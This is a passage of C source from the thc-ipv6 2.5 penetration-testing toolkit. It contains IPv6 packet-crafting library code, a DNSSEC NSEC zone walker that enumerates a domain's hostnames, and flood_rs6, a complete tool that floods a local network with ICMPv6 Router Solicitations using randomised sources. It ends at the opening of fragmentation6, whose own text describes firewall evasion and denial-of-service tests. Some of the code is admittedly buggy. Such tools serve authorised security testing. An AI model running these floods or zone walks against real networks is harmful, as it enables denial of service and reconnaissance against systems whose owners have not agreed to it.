(_thc_ipv6_showerrors) fprintf(stderr, "Warning: packet size is larger than MTU of interface (%d > %d)!\n", hdr->pkt_len, thc_get_mtu(interface)); if (thc_get_mtu(interface) == -1) { if (_thc_ipv6_showerrors) fprintf(stderr, "Error: interface invalid\n"); exit( -1); } } return sendto(thc_socket, hdr->pkt, hdr->pkt_len, 0, &sa, sizeof(sa)); } int thc_generate_and_send_pkt(char *interface, unsigned char *srcmac, unsigned char *dstmac, unsigned char *pkt, int *pkt_len) { if (thc_generate_pkt(interface, srcmac, dstmac, pkt, pkt_len)) return -1; while (thc_send_pkt(interface, pkt, pkt_len) == -1) usleep(1); return 0; } unsigned char *thc_destroy_packet(unsigned char *pkt) { char *ptrs[16375]; int iptr = 0; char *next; int type; thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; thc_ipv6_ext_hdr *ehdr; thc_icmp6_hdr *ihdr; thc_tcp_hdr *thdr; thc_udp_hdr *uhdr; ptrs[iptr] = pkt; iptr++; next = hdr->next_segment; type = hdr->next; if (hdr->pkt != NULL) free(hdr->pkt); while (type == NXT_HDR || type == NXT_ROUTE || type == NXT_FRAG || type == NXT_OPTS || type == NXT_INVALID || type == NXT_IGNORE || type == NXT_AH || type == NXT_ESP) { ehdr = (thc_ipv6_ext_hdr *) next; ptrs[iptr] = ehdr->data; iptr++; ptrs[iptr] = (char *) ehdr; iptr++; next = ehdr->next_segment; type = ehdr->next; } switch (type) { case NXT_NONXT: break; case NXT_ICMP6: ihdr = (thc_icmp6_hdr *) next; ptrs[iptr] = ihdr->data; iptr++; ptrs[iptr] = (char *) ihdr; iptr++; break; case NXT_TCP: thdr = (thc_tcp_hdr *) next; ptrs[iptr] = thdr->option; iptr++; ptrs[iptr] = thdr->data; iptr++; ptrs[iptr] = (char *) thdr; iptr++; break; case NXT_UDP: uhdr = (thc_udp_hdr *) next; ptrs[iptr] = uhdr->data; iptr++; ptrs[iptr] = (char *) uhdr; iptr++; break; case NXT_IP4_RUDIMENTARY: free(next); break; case NXT_DATA: ehdr = (thc_ipv6_ext_hdr *) next; ptrs[iptr] = ehdr->data; iptr++; ptrs[iptr] = (char *) ehdr; iptr++; break; case NXT_PIM: ehdr = (thc_ipv6_ext_hdr *) next; ptrs[iptr] = ehdr->data; iptr++; ptrs[iptr] = (char *) ehdr; iptr++; break; // XXX TODO: other protocols default: if (_thc_ipv6_showerrors) fprintf(stderr, "Error: Data packet type %d not implemented - some data not free'ed!\n", type); } ptrs[iptr] = NULL; while (iptr >= 0) { if (debug) printf("free ptrs[%d]=%p\n", iptr, ptrs[iptr]); if (ptrs[iptr] != NULL) free(ptrs[iptr]); iptr--; } return NULL; } void thc_dump_data(unsigned char *buf, int len, char *text) { unsigned char *p = (unsigned char *) buf; unsigned char lastrow_data[16]; int rows = len / 16; int lastrow = len % 16; int i, j; if (buf == NULL || len == 0) return; if (text != NULL && text[0] != 0) printf("%s (%d bytes):\n", text, len); for (i = 0; i < rows; i++) { printf("%04hx: ", i * 16); for (j = 0; j < 16; j++) { printf("%02x", p[(i * 16) + j]); if (j % 2 == 1) printf(" "); } printf(" [ "); for (j = 0; j < 16; j++) { if (isprint(p[(i * 16) + j])) printf("%c", p[(i * 16) + j]); else printf("."); } printf(" ]\n"); } if (lastrow > 0) { memset(lastrow_data, 0, sizeof(lastrow_data)); memcpy(lastrow_data, p + len - lastrow, lastrow); printf("%04hx: ", i * 16); for (j = 0; j < lastrow; j++) { printf("%02x", p[(i * 16) + j]); if (j % 2 == 1) printf(" "); } while (j < 16) { printf(" "); if (j % 2 == 1) printf(" "); j++; } printf(" [ "); for (j = 0; j < lastrow; j++) { if (isprint(p[(i * 16) + j])) printf("%c", p[(i * 16) + j]); else printf("."); } while (j < 16) { printf(" "); j++; } printf(" ]\n"); } } unsigned char *thc_memstr(char *haystack, char *needle, int haystack_length, int needle_length) { register int i; if (needle_length > haystack_length) return NULL; for (i = 0; i <= haystack_length - needle_length; i++) if (memcmp(haystack + i, needle, needle_length) == 0) return (haystack + i); return NULL; } #ifdef _HAVE_SSL /* Added by willdamn 2006/07 */ thc_key_t *thc_generate_key(int key_len) { thc_key_t *key; if ((key = (thc_key_t *) malloc(sizeof(thc_key_t))) == NULL) return NULL; if ((key->rsa = RSA_generate_key(key_len, 65535, NULL, NULL)) == NULL) return NULL; key->len = key_len; return key; } thc_cga_hdr *thc_generate_cga(unsigned char *prefix, thc_key_t * key, unsigned char **cga) { thc_cga_hdr *cga_hdr; unsigned char md_value[EVP_MAX_MD_SIZE]; unsigned char *p, *tmp; int klen, rand_fd, cgasize, ignore = 0; if ((cga_hdr = (thc_cga_hdr *) malloc(sizeof(thc_cga_hdr))) == NULL) return NULL; cga_hdr->type = 11; /* prepare CGA paramater */ /* CGA header & mod_value, prefix, collision_count from CGA parameter */ cgasize = 29; if ((rand_fd = open("/dev/urandom", O_RDONLY)) < 0) { if (_thc_ipv6_showerrors) printf("Cannot open source of randomness!\n"); free(cga_hdr); return NULL; } ignore = read(rand_fd, cga_hdr->modifier, 16); close(rand_fd); /* DER-encode public key */ klen = i2d_RSA_PUBKEY(key->rsa, NULL); if ((cga_hdr->pub_key = (unsigned char *) malloc(klen)) == NULL) { return NULL; free(cga_hdr); } p = cga_hdr->pub_key; klen = i2d_RSA_PUBKEY(key->rsa, &p); key->len = klen; cgasize += klen; cga_hdr->collision_cnt = 0; memcpy(cga_hdr->prefix, prefix, 8); if ((tmp = malloc(cgasize - 4)) == NULL) { if (_thc_ipv6_showerrors) perror("tmp malloc "); free(cga_hdr); return NULL; } memcpy(tmp, cga_hdr->modifier, 25); memcpy(tmp + 25, cga_hdr->pub_key, klen); /* compute hash1 */ SHA1(tmp, cgasize - 4, md_value); free(tmp); if (cgasize % 8 == 0) { cga_hdr->len = cgasize / 8; cga_hdr->pad_len = 0; } else { cga_hdr->len = cgasize / 8 + 1; cga_hdr->pad_len = cga_hdr->len * 8 - cgasize; cga_hdr->pad = (char *) malloc(cga_hdr->pad_len); } /* Prepare CGA */ if ((*cga = (char *) malloc(16)) == NULL) { free(cga_hdr); return NULL; } memcpy(*cga, prefix, 8); /* add address identifier to cga */ memcpy(*cga + 8, md_value, 8); /* set "U" & "G" bits ; currently sec equals 0 */ *(*cga + 8) &= 0x1c; // XXX BUG TODO FIXME: // here must be something missing in will's code. // cga is not pointed to by cga_hdr when we return return cga_hdr; } thc_timestamp_hdr *generate_timestamp(void) { thc_timestamp_hdr *timestamp; struct timeval time; if ((timestamp = (thc_timestamp_hdr *) calloc(1, sizeof(thc_timestamp_hdr))) == NULL) return NULL; timestamp->type = 13; timestamp->len = 2; gettimeofday(&time, NULL); timestamp->timeval = bswap_64(time.tv_sec << 16); return timestamp; } thc_nonce_hdr *generate_nonce(void) { thc_nonce_hdr *nonce; if ((nonce = (thc_nonce_hdr *) malloc(sizeof(thc_nonce_hdr))) == NULL) return NULL; nonce->type = 14; nonce->nonce[0] = nonce->nonce[3] = 0xa; nonce->nonce[1] = nonce->nonce[4] = 0xc; nonce->nonce[2] = nonce->nonce[5] = 0xe; nonce->len = sizeof(thc_nonce_hdr) / 8; return nonce; } thc_rsa_hdr *thc_generate_rsa(char *data2sign, int data2sign_len, thc_cga_hdr * cga_hdr, thc_key_t * key) { thc_rsa_hdr *rsa_hdr; unsigned char md_value[EVP_MAX_MD_SIZE], hash[20]; int rsa_hdr_len, sign_len, fd, ignore = 0; if ((rsa_hdr = (thc_rsa_hdr *) malloc(sizeof(thc_rsa_hdr))) == NULL) return NULL; rsa_hdr->type = 12; /* compute public key hash */ SHA1(cga_hdr->pub_key, key->len, md_value); memcpy(rsa_hdr->key_hash, md_value, 16); /* If cga type tag's unknown set a bad RSA signature, e.g useful for DoS */ if (data2sign_len > 0) SHA1(data2sign, data2sign_len, hash); else { fd = open("/dev/urandom", O_RDONLY); ignore = read(fd, hash, 20); close(fd); } sign_len = RSA_size(key->rsa); if ((rsa_hdr->sign = malloc(sign_len)) == NULL) { free(rsa_hdr); return NULL; } if (RSA_sign(NID_sha1, hash, 20, rsa_hdr->sign, &sign_len, key->rsa) == 0) { if (_thc_ipv6_showerrors) printf("Error during generating RSA signature! \n"); free(rsa_hdr); return NULL; } rsa_hdr_len = 20 + sign_len; if (rsa_hdr_len % 8 == 0) { rsa_hdr->len = rsa_hdr_len / 8; rsa_hdr->pad = NULL; } else { rsa_hdr->len = rsa_hdr_len / 8 + 1; rsa_hdr->pad = malloc(rsa_hdr->len * 8 - rsa_hdr_len); } return rsa_hdr; } int thc_add_send(unsigned char *pkt, int *pkt_len, int type, int code, unsigned int flags, unsigned char *data, int data_len, thc_cga_hdr * cga_hdr, thc_key_t * key, unsigned char *tag, int checksum) { thc_ipv6_hdr *hdr = (thc_ipv6_hdr *) pkt; thc_icmp6_hdr *ihdr = malloc(sizeof(thc_icmp6_hdr)); thc_ipv6_ext_hdr *ehdr; thc_nonce_hdr *nonce_hdr = NULL; thc_timestamp_hdr *timestamp_hdr = NULL; thc_rsa_hdr *rsa_hdr = NULL; unsigned char *ndp_opt_buff, *data2sign = NULL; char *buff; int ndp_opt_len, data2sign_len, offset; /* build standard part of ND message */ if (ihdr == NULL) return -1; memset(ihdr, 0, sizeof(thc_icmp6_hdr)); if (hdr->final != NULL) { ehdr = (thc_ipv6_ext_hdr *) hdr->final; ehdr->next_segment = (char *) ihdr; ehdr->next = NXT_ICMP6; } else { hdr->next_segment = (char *) ihdr; hdr->next = NXT_ICMP6; } hdr->final = (char *) ihdr; hdr->final_type = NXT_ICMP6; ihdr->type = type; ihdr->code = code; ihdr->flags = flags; if (checksum == 0) { ihdr->checksum = DO_CHECKSUM; } else ihdr->checksum = checksum; if (data_len > 0 && data != NULL) ndp_opt_len = data_len; else ndp_opt_len = 0; hdr->length += 8; *pkt_len += 8; /* add various security features to ND message */ /* determine options' total length */ if ((cga_hdr == NULL)) return -1; ndp_opt_len += cga_hdr->len * 8; if ((timestamp_hdr = generate_timestamp()) == NULL) return -1; ndp_opt_len += timestamp_hdr->len * 8; if ((nonce_hdr = generate_nonce()) == NULL) { free(timestamp_hdr); return -1; } ndp_opt_len += nonce_hdr->len * 8; /* create options buffer */ if ((ndp_opt_buff = (char *) malloc(ndp_opt_len)) == NULL) { free(timestamp_hdr); free(nonce_hdr); return -1; } offset = 0; if (data != NULL) { memcpy(ndp_opt_buff + offset, data, data_len); offset += data_len; } /* CGA option */ memcpy(ndp_opt_buff + offset, cga_hdr, 29); memcpy(ndp_opt_buff + offset + 29, cga_hdr->pub_key, key->len); offset += (cga_hdr->len * 8); /* timestamp option */ memcpy(ndp_opt_buff + offset, timestamp_hdr, timestamp_hdr->len * 8); offset += timestamp_hdr->len * 8; free(timestamp_hdr); /* nonce option */ memcpy(ndp_opt_buff + offset, nonce_hdr, nonce_hdr->len * 8); offset += nonce_hdr->len * 8; free(nonce_hdr); /* RSA signature * If CGA message type tag given compute correct RSA signature * otherwise set option with incorrect one */ if (tag != NULL) { data2sign_len = 52 + ndp_opt_len; if ((data2sign = (char *) malloc(data2sign_len)) == NULL) { free(ndp_opt_buff); return -1; } memcpy(data2sign, tag, 16); memcpy(data2sign + 16, hdr->src, 16); memcpy(data2sign + 32, hdr->dst, 16); /* compute icmp checksum that is needed to compute rsa signature */ if ((buff = malloc(8 + ndp_opt_len)) == NULL) { free(data2sign); free(ndp_opt_buff); return -1; } memcpy(buff, ihdr, 8); memcpy(buff + 8, ndp_opt_buff, ndp_opt_len); ihdr->checksum = checksum_pseudo_header(hdr->src, hdr->dst, NXT_ICMP6, buff, 8 + ndp_opt_len); free(buff); memcpy(data2sign + 48, &ihdr->type, 4); ihdr->checksum = 0; memcpy(data2sign + 52, ndp_opt_buff, ndp_opt_len); } else data2sign_len = -1; if ((rsa_hdr = thc_generate_rsa(data2sign, data2sign_len, cga_hdr, key)) == NULL) { free(ndp_opt_buff); free(data2sign); return -1; } ihdr->data_len = ndp_opt_len + rsa_hdr->len * 8; free(data2sign); /* create 'real' buffer for NDP options */ if ((ihdr->data = (unsigned char *) malloc(ihdr->data_len)) == NULL) { free(ndp_opt_buff); free(rsa_hdr); return -1; } memcpy(ihdr->data, ndp_opt_buff, ndp_opt_len); free(ndp_opt_buff); /* RSA signature option */ memcpy(ihdr->data + ndp_opt_len, rsa_hdr, 20); memcpy(ihdr->data + ndp_opt_len + 20, rsa_hdr->sign, rsa_hdr->len * 8 - 20); hdr->length += ihdr->data_len; *pkt_len += ihdr->data_len; free(rsa_hdr); return 0; } #endif int thc_bind_udp_port(int port) { int on = 1, s; /* int fromlen, error; struct ipv6_mreq mreq6; static struct iovec iov; struct sockaddr_storage from; struct msghdr mhdr;*/ struct addrinfo hints, *res; char pbuf[16]; memset(&hints, 0, sizeof(hints)); hints.ai_family = AF_INET6; hints.ai_socktype = SOCK_DGRAM; hints.ai_protocol = IPPROTO_UDP; hints.ai_flags = AI_PASSIVE; snprintf(pbuf, sizeof(pbuf), "%d", port); if (getaddrinfo(NULL, pbuf, &hints, &res) < 0) return -1; if ((s = socket(res->ai_family, res->ai_socktype, res->ai_protocol)) < 0) return -1; #ifdef SO_REUSEPORT setsockopt(s, SOL_SOCKET, SO_REUSEPORT, &on, sizeof(on)); printf("reuseport\n"); #endif #ifdef SO_REUSEADDR setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on)); #endif #ifdef IPV6_PKTINFO setsockopt(s, IPPROTO_IPV6, IPV6_PKTINFO, &on, sizeof(on)); #else setsockopt(s, IPPROTO_IPV6, IPV6_RECVPKTINFO, &on, sizeof(on)); #endif #ifdef IPV6_V6ONLY setsockopt(s, IPPROTO_IPV6, IPV6_V6ONLY, &on, sizeof(on)); #endif if (bind(s, res->ai_addr, res->ai_addrlen) < 0) return -1; freeaddrinfo(res); return s; } int thc_bind_multicast_to_socket(int s, char *interface, char *src) { struct ipv6_mreq mreq6; if (src == NULL || interface == NULL || s < 0) return -1; memset(&mreq6, 0, sizeof(mreq6)); mreq6.ipv6mr_interface = if_nametoindex(interface); memcpy(&mreq6.ipv6mr_multiaddr, src, 16); if (setsockopt(s, IPPROTO_IPV6, IPV6_JOIN_GROUP, &mreq6, sizeof(mreq6)) < 0) return -1; return 0; } thc-ipv6-2.5/dnssecwalk.c0000644000000000000000000002306612251022434014022 0ustar rootroot/* * Simple DNSSEC walker requiring no special libraries. * * (c) 2013 by Marc "van Hauser" Heuse or * The AGPL v3 license applies to this code. * * Works against DNSSEC servers which have NSEC enabled (default) * instead of NSEC3 :-) * * Compile simply as gcc -O2 -o dnssecwalk dnssecwalk.c * */ #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" #define RETRY 5 int debug = 0, errcnt = 0, sock, ensure = 0, dores = -1; char *dst, first[256], beforesub[256], firstsub[256]; int dnssocket(char *server) { struct addrinfo *ai; struct addrinfo hints; int s; memset(&hints, 0, sizeof(struct addrinfo)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_DGRAM; hints.ai_protocol = IPPROTO_UDP; if (getaddrinfo(server, "53", &hints, &ai) != 0) { fprintf(stderr, "Error: unable to resolve dns server %s\n", dst); exit(-1); } if ((s = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol)) < 0) { fprintf(stderr, "Error: unable to get a socket %s\n", dst); exit(-1); } if (connect(s, ai->ai_addr, ai->ai_addrlen) < 0) { fprintf(stderr, "Error: unable to connect to dns server %s\n", dst); exit(-1); } freeaddrinfo(ai); return s; } void noreply(int signo) { ++errcnt; if (errcnt < RETRY) { fprintf(stderr, "Warning: DNS server timeout (%d of %d retries)\n", errcnt, RETRY); close(sock); sock = -1; return; } else { fprintf(stderr, "Error: Giving up on DNS server, too many timeouts\n"); exit(1); } } int main(int argc, char **argv) { unsigned char buf[1024], buf2[1024]; char *ptr, *ptr2, nexthost[256], domain[256]; char b1[] = { 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; char b2[] = { 0x00, 0x2f, 0x00, 0x01 }; int pid = getpid(), dlen = 0, i = 0, fixi, len, ok = 1, cnt = 0, errcntbak, sub = 0; struct addrinfo hints, *res, *p; struct sockaddr_in6 *ipv6, *q; struct sockaddr_in *ipv4, *q4; char ipv4str[16], ipv6str[40]; void *addr, *addr4; setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); if (argc < 3) { printf("%s v1.2 (c) 2013 by Marc Heuse http://www.mh-sec.de\n\n", argv[0]); printf("Syntax: %s [-e46] dns-server domain\n\n", argv[0]); printf("Options:\n -e ensure that the domain is present in found addresses, quit otherwise\n -4 resolve found entries to IPv4 addresses\n -6 resolve found entries to IPv6 addresses\n\n"); printf("Perform DNSSEC NSEC walking.\n\nExample: %s dns.test.com test.com\n", argv[0]); exit(0); } while ((i = getopt(argc, argv, "e46")) >= 0) { switch(i) { case 'e': ensure = 1; break; case '4': if (dores == -1) dores = AF_INET; else dores = 0; break; case '6': if (dores == -1) dores = AF_INET6; else dores = 0; break; default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } dst = argv[optind]; sock = dnssocket(dst); for (i = 0; i < strlen(argv[optind]); i++) argv[optind][i] = (char)tolower((int)argv[optind][i]); for (i = 0; i < strlen(argv[optind + 1]); i++) argv[optind + 1][i] = (char)tolower((int)argv[optind + 1][i]); if (index(argv[optind + 1], '.') == NULL) { fprintf(stderr, "Error: not a valid domain (must be at least \".\"): %s\n", argv[optind + 1]); exit(-1); } strncpy(domain, argv[optind + 1], sizeof(nexthost) - 2); domain[sizeof(domain) - 2] = 0; if (domain[strlen(domain) - 1] != '.') strcat(domain, "."); strncpy(nexthost, argv[optind + 1], sizeof(nexthost) - 1); nexthost[sizeof(nexthost) - 1] = 0; memcpy(buf, (char *) &pid + _TAKE2, 2); memcpy(buf + 2, b1, sizeof(b1)); i = 2 + sizeof(b1); fixi = i; if (dores >= 0) { memset((char*)&hints, 0, sizeof(hints)); hints.ai_family = dores; } printf("Starting DNSSEC walking on server %s about %s\n", dst, domain); while (ok == 1) { ptr = nexthost; i = fixi; // domain-encoded-here foo.com == \x03foo\x03com\x00 == dlen if (strcmp(ptr, ".") != 0) do { if ((ptr2 = index(ptr, '.')) != NULL) *ptr2 = 0; len = strlen(ptr); buf[i++] = len; memcpy(buf + i, ptr, len); i += len; dlen += (len + 1); ptr = ptr2; if (ptr != NULL) ptr++; } while (ptr != NULL && *ptr != 0); buf[i++] = 0; memcpy(buf + i, b2, sizeof(b2)); i += sizeof(b2); dlen = i; resend: if (send(sock, buf, dlen, 0) < 0) { fprintf(stderr, "Error: can not send to network\n"); exit(-1); } if (debug) { len = i; for (i = 0; i < len; i++) { if (i % 16 == 0) printf(" "); if (i % 8 == 0) printf(" "); printf("%02x ", buf[i]); if (i % 16 == 15) printf("\n"); } printf("\n\n"); } errcntbak = errcnt; signal(SIGALRM, noreply); alarm(5); memset(buf2, 0, sizeof(buf2)); len = recv(sock, buf2, sizeof(buf2), 0); alarm(0); if (sock == -1) sock = dnssocket(dst); if (len == 0 && errcntbak == errcnt) errcnt++; if ((errcntbak != errcnt) && errcnt > 0 && errcnt <= RETRY) goto resend; if (RETRY < errcnt) noreply(0); if ((buf2[3] & 9) == 9 || (buf2[3] & 15) == 2) { printf("Result: server not responsible for domain %s\n", nexthost); exit(1); } else if (buf2[3] == 5) { printf("Result: server does not support NSEC, dnssec walking not possible\n"); exit(1); } else if ((buf2[3] & 15) > 0) { printf("Result: unknown error (%d)\n", (buf2[3] & 15)); exit(1); } else if (buf2[7] != 1) { printf("Result: server does not support NSEC, dnssec walking not possible\n"); exit(1); } ptr = (char *) (buf2 + i); while (ptr < (char *) (buf2 + len) && *ptr != 0x2f) ptr++; ptr += 9; ptr2 = ptr + 1; i = *ptr; if (*ptr == 0) { ptr++; } else { while (i != 0) { ptr += i + 1; i = *ptr; *ptr = '.'; } } *ptr++ = '.'; *ptr = 0; if (*ptr2 != 0) { for (i = 0; i < strlen(ptr2); i++) ptr2[i] = (char)tolower((int)ptr2[i]); if (strcasecmp(ptr2, domain) == 0) ok = 2; else { if (sub == 1) { if (strcmp(firstsub, ptr2) == 0 || strcmp(beforesub, ptr2) == 0) { fprintf(stderr, "Error: loop detected (sub), aborting\n"); exit(-1); } } if (cnt != 0) { if ((ptr2[2 + strlen(ptr2)] & 2) == 2) { fprintf(stderr, "Warning: start of a sub domain: %s - following items can not be enumerated automatically (don't blame the tool, NSEC is broken. Brute force the next valid hostname and rerun the tool with hostname++.domain.)\n", nexthost); sub = 1; strcpy(beforesub, nexthost); strncpy(firstsub, ptr2, sizeof(firstsub) - 1); firstsub[sizeof(firstsub) - 1] = 0; } if (strcmp(ptr2, first) == 0 || strcmp(ptr2, nexthost) == 0) { fprintf(stderr, "Error: loop detected, aborting\n"); exit(-1); } strncpy(nexthost, ptr2, sizeof(nexthost) - 1); nexthost[sizeof(nexthost) - 1] = 0; } else { strncpy(nexthost, ptr2, sizeof(nexthost) - 1); nexthost[sizeof(nexthost) - 1] = 0; strcpy(first, nexthost); } if (ensure && strstr(nexthost, domain) == NULL) { fprintf(stderr, "Error: domain %s not found in result %s, exiting\n", domain, nexthost); exit(-1); } if (dores != -1) { if (getaddrinfo(nexthost, NULL, &hints, &res) == 0) { printf("Found: %s", nexthost); q = NULL; q4 = NULL; for (p = res; p != NULL; p = p->ai_next) { if (p->ai_family == AF_INET6) { // IPv6 ipv6 = (struct sockaddr_in6 *) p->ai_addr; addr = &(ipv6->sin6_addr); // convert the IP to a string and print it: if (q == NULL || memcmp(&ipv6->sin6_addr, &q->sin6_addr, 16) != 0) { q = ipv6; inet_ntop(p->ai_family, addr, ipv6str, sizeof ipv6str); printf(" => %s", ipv6str); } } else if (p->ai_family == AF_INET) { ipv4 = (struct sockaddr_in *) p->ai_addr; addr4 = &(ipv4->sin_addr); if (q4 == NULL || memcmp(&ipv4->sin_addr, &q4->sin_addr, 4) != 0) { q4 = ipv4; inet_ntop(p->ai_family, addr4, ipv4str, sizeof ipv4str); printf(" => %s", ipv4str); } } } printf("\n"); freeaddrinfo(res); // free the linked list } else printf("Found: %s\n", nexthost); } else printf("Found: %s\n", nexthost); cnt++; errcnt = 0; } } else ok = 0; if (ok == 0) { for (i = 0; i < len; i++) { if (i % 16 == 0) printf(" "); if (i % 8 == 0) printf(" "); printf("%02x ", buf2[i]); if (i % 16 == 15) printf("\n"); } printf("\n"); } } if (ok == 2) printf("Done, %d entries found.\n", cnt); close(sock); if (ok == 2) return 0; else return -1; } thc-ipv6-2.5/flood_rs6.c0000644000000000000000000000723012256337476013600 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" extern int debug; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-sS] interface [target]\n\n", prg); printf("Flood the local network with ICMPv6 Router Soliciation packets.\n"); printf("Option -s uses random source IPv6 addresses. Option -S also randomizes the MAC.\n"); // printf("-F/-D/-H add fragment/destination/hopbyhop header to bypass simple filters\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } int main(int argc, char *argv[]) { char *interface; unsigned char mac[6] = "", *mac6 = mac; unsigned char buf[1460]; unsigned char *dst = thc_resolve6("ff02::1"), *src = NULL, *dstmac = NULL; int i, k, type = NXT_ICMP6, offset = 14, mychecksum, prefer = PREFER_LINK; unsigned char *pkt2 = NULL; int pkt_len2 = 0, rawmode = 0, count = 0, do_hop = 0, do_frag = 0, do_dst = 0; int until = 0, rand_src = 0, rand_mac = 0; thc_ipv6_hdr *hdr = NULL; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "sSDFH")) >= 0) { switch (i) { case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; case 's': rand_src = 1; break; case 'S': rand_mac = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 1) help(argv[0]); srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); interface = argv[optind]; if (argc - optind > 1) { if ((dst = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: could not resolve %s\n", argv[optind + 1]); exit(-1); } if (dst[0] >= 0x20 && dst[0] <= 0xfd) prefer = PREFER_GLOBAL; } dstmac = thc_get_mac(interface, src, dst); src = thc_get_own_ipv6(interface, dst, prefer); mac6 = thc_get_own_mac(interface); if (mac6 == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } memset(buf, 0, sizeof(buf)); buf[0] = 1; buf[1] = 1; memcpy(buf + 2, mac6, 6); i = 8; if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len2, src, dst, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt2, &pkt_len2, ICMP6_ROUTERSOL, 0, 0, buf, i, 0) < 0) return -1; thc_generate_pkt(interface, mac6, dstmac, pkt2, &pkt_len2); hdr = (thc_ipv6_hdr *) pkt2; k = rand(); if (do_hdr_size) offset = do_hdr_size; printf("Starting to flood with ICMPv6 redirects on %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (until != 1) { if (rand_mac) { memcpy(hdr->pkt + 8, (char*) &k + _TAKE4, 4); memcpy(hdr->pkt + 14 + 40 + 8 + 2 + 2, (char*) &k + _TAKE4, 4); } if (rand_src) { memcpy(hdr->pkt + 14 + 8 + 8 + 5, (char*) &k + _TAKE3, 3); } if (rand_mac || rand_src) { hdr->pkt[offset + 42] = 0; hdr->pkt[offset + 43] = 0; mychecksum = checksum_pseudo_header(hdr->pkt + offset + 8, hdr->pkt + offset + 24, NXT_ICMP6, hdr->pkt + offset + 40, pkt_len2 - offset - 40); hdr->pkt[offset + 42] = mychecksum / 256; hdr->pkt[offset + 43] = mychecksum % 256; k++; } count++; if (thc_send_pkt(interface, pkt2, &pkt_len2) < 0) { printf("!"); } // usleep(1); if (count % 1000 == 0) printf("."); if (until > 1) until--; } return 0; } thc-ipv6-2.5/fragmentation6.c0000644000000000000000000022217112251022437014611 0ustar rootroot/* * checks if a firewall performs a check on a second, duplicate fragment * */ #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" int matched = 0, gtype1, gtype1a, gtype2, gtype2a, gpos, epos; unsigned char *gpattern, *gsrc, *gdst; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-fp] [-n number] interface destination [test-case-no]\n\n", prg); printf("-f activates flooding mode, no pauses between sends; -p disables first and\n"); printf("final pings, -n number specifies how often each test is performed\n"); printf("\nPerforms fragment firewall and implementation checks, incl. denial-of-service.\n"); exit(-1); } int main(int argc, char *argv[]) { int count = 0, only = 0, i, flood = 0, ping = 1, resend = 1, curr = 0; unsigned char buf[1500], bla[1200], tests[256], lbuf[67000]; unsigned char *dst6, *src6; unsigned char *srcmac = NULL, *dstmac = NULL; thc_ipv6_hdr *hdr; int offset = 14, fragsize = 0; unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL; int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0; char *interface, tos; char ch = 'A'; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "fpn:")) >= 0) { switch (i) { case 'n': resend = atoi(optarg); break; case 'p': ping = 0; break; case 'f': flood = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 2) help(argv[0]); if (do_hdr_size) offset = do_hdr_size; interface = argv[optind]; dst6 = thc_resolve6(argv[optind + 1]); if (argc - optind > 2 && argv[optind + 2] != NULL) only = atoi(argv[optind + 2]); if (flood && (only == 0 || resend != 1)) { fprintf(stderr, "Error: the -f flood option must be used with a defined testcase, and the -n option can not be used with it\n"); exit(-1); } if ((src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } srcmac = thc_get_own_mac(interface); if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]); exit(-1); } fragsize = ((200 - 62) / 8) * 8; setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); memset(tests, 0, sizeof(tests)); memset(lbuf, 'A', sizeof(lbuf)); printf("Run a sniffer behind the firewall to see what passes through\n\n"); memset(bla, ch++, sizeof(bla)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &bla, sizeof(bla), 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; /**/ memset(bla, 'Z', sizeof(bla)); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src6, dst6, 255, 0, count, 0, 0)) == NULL) return -1; thc_add_icmp6(pkt2, &pkt_len2, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &bla, sizeof(bla), 0); if (thc_generate_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) < 0) return -1; //dummy, dont remove, incomplete by choice if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src6, dst6, 64, 0, count, 0, 0)) == NULL) return -1; printf("ATTACK initialisation\n"); if (ping) { printf(" Sending ping to %s\n", argv[optind + 1]); thc_ping6(interface, src6, dst6, 10, 1); // printf("Now sleeping for 1 second\n"); sleep(1); } 